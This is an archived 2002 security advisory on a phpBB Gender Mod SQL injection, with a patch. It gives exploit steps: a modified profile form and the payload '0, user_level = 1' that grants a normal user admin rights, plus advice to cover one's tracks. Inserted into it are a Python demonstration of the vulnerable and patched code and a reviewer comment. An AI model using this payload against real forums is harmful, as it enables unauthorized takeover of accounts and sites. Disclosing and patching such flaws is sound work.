phpBB/gender mod allows get admin privilege, exploit/patch

From: langtuhaohoa caothuvolam (trungonlyat_private)
Date: Sat Jul 27 2002 - 07:16:06 PDT

    ######################################################################### 
    ## Announcement:
    ## Fix for the user-privilege-change bug in phpBB 2.x
    ## In phpBB with the official Gender Mod, this vulnerability allows a normal
    ## user to make her/himself a forum administrator.
    ##
    ## Author: PTTrung
    ## http://hackervn.net (caothuvolam) http://viethacker.net (langtuhaohoa)
    ## trungonlyat_private
    ##
    ## Description:
    ## Gender Mod is a commonly used modification for official phpBB releases.
    ## The posted "gender" value is not validated before it is placed in the
    ## UPDATE SQL statement, so a crafted value can append extra column
    ## assignments to that statement.
    ## This affects the newest version, 1.1.3.
    ## If you append 'user_level = 1' to the value, you get ADMINISTRATOR
    ## PRIVILEGE in the forum.
    ##
    ## Exploit:
    ## 1. Save the User Profile page to disk so you can modify it offline.
    ## 2. Set the form action to the full URL of the profile script
    ##    (http://forum.victim.com/...):
    ##   <FORM action=http://forum.victim.com/profile.php?sid=<current_session_id>
    ##      method=post encType=multipart/form-data>
    ## 3. Modify the HTML form so that the input field "gender" has a value like:
    ##   <input type=text name=gender value="0, user_level = 1 ">
    ## 4. Load this page in the same browser window where the session cookie
    ##    is still valid. Take care to cover your tracks, then hit Submit
    ##    to change the user profile. Done.
    ##
    ## Patch:
    ## File to patch:
    ## forumroot/includes/usercp_register.php
    ##
    ## Note:
    ## The phpBB team has also been emailed about this problem.
    ## 
    ######################################################################### 
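As an added example (not code from the advisory or from phpBB), the following Python stand-in reproduces the mechanism the Description and Exploit sections describe: the posted gender value is spliced unquoted into an UPDATE, so the value `0, user_level = 1` adds a second column assignment, and the patch's intval() cast neutralises it. The in-memory table layout, the column names and the `php_intval` emulation of PHP's intval() are assumptions made for the example; the payload and the admin level value 1 are the advisory's.

```python
"""Unchecked posted 'gender' value spliced into an UPDATE: vulnerable vs patched.

Constructed example; the schema below is a stand-in for the phpBB users table
(assumption: only the columns needed here, with user_level 1 = administrator).
"""
import re
import sqlite3

SCHEMA = """
CREATE TABLE phpbb_users (
    user_id     INTEGER PRIMARY KEY,
    username    TEXT    NOT NULL,
    user_level  INTEGER NOT NULL DEFAULT 0,
    user_gender INTEGER NOT NULL DEFAULT 0
);
INSERT INTO phpbb_users VALUES (2, 'admin', 1, 0);
INSERT INTO phpbb_users VALUES (3, 'alice', 0, 0);
"""

ADMIN_LEVEL = 1
# The value the advisory puts into the "gender" form field.
PAYLOAD = "0, user_level = 1"


def fresh_db():
    """New in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def php_intval(value):
    """Emulates PHP intval() on a string: leading optional sign and digits, else 0.

    intval("0, user_level = 1") is 0, intval("12abc") is 12, intval("abc") is 0.
    """
    m = re.match(r"\s*([+-]?\d+)", str(value))
    return int(m.group(1)) if m else 0


def update_gender_vulnerable(conn, user_id, posted_gender):
    """Pre-patch pattern: the posted value is concatenated into the statement
    unquoted, so extra 'column = value' pairs ride along. Returns the SQL run."""
    sql = "UPDATE phpbb_users SET user_gender = %s WHERE user_id = %d" % (
        posted_gender, int(user_id))
    conn.execute(sql)
    conn.commit()
    return sql


def update_gender_patched(conn, user_id, posted_gender):
    """Patched pattern: intval()-style cast (as in the advisory's fix) plus a
    bound parameter so the value can never become SQL. Returns the stored int."""
    gender = php_intval(posted_gender)
    conn.execute(
        "UPDATE phpbb_users SET user_gender = ? WHERE user_id = ?",
        (gender, int(user_id)))
    conn.commit()
    return gender


def user_level(conn, user_id):
    """Current user_level of the given user."""
    row = conn.execute(
        "SELECT user_level FROM phpbb_users WHERE user_id = ?",
        (user_id,)).fetchone()
    return row[0]


def demo(user_id=3):
    """Run the payload through both code paths and report the resulting levels."""
    vuln = fresh_db()
    sql = update_gender_vulnerable(vuln, user_id, PAYLOAD)
    fixed = fresh_db()
    stored = update_gender_patched(fixed, user_id, PAYLOAD)
    return {
        "vulnerable_sql": sql,
        "vulnerable_level": user_level(vuln, user_id),
        "vulnerable_is_admin": user_level(vuln, user_id) == ADMIN_LEVEL,
        "patched_stored_gender": stored,
        "patched_level": user_level(fixed, user_id),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable path executes `UPDATE phpbb_users SET user_gender = 0, user_level = 1 WHERE user_id = 3`, which is exactly why the injected value has to start with a valid number: the statement must still parse. Casting with intval() keeps only that leading `0`; binding the result as a parameter is the extra step a modern fix would take so that no later change to the query can reintroduce the problem.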
    
    # Patch
    #
    #-----[ OPEN ]------------------------------------------ 
    # 
        forumroot/includes/usercp_register.php
    
    # 
    #-----[ FIND ]------------------------------------------ 
    # 
    
    	$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS
    ['gender'] : 0;
    
    # 
    #-----[ REPLACE AS ]------------------------------------ 
    # 
    
    	$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval
    ($HTTP_POST_VARS['gender']) : 0;
    
    # 
    #-----[ SAVE/CLOSE/UPLOAD THIS FILE ]------------------- 
    # 
    # EoP 
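Review bot: in the REPLACE block, intval() stops the injected `, user_level = 1` tail by keeping only the leading integer, but it still stores any integer (negative or out of range) in the gender column; after the cast, consider resetting the value to 0 when it is not one of the values the mod defines. Note also that both the FIND and the REPLACE statements are wrapped across two lines here by the mail archive; in usercp_register.php each is a single line, so match on the whole `$gender = ...` statement rather than pasting these lines verbatim.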
    



    This archive was generated by hypermail 2b30 : Sun Jul 28 2002 - 00:58:03 PDT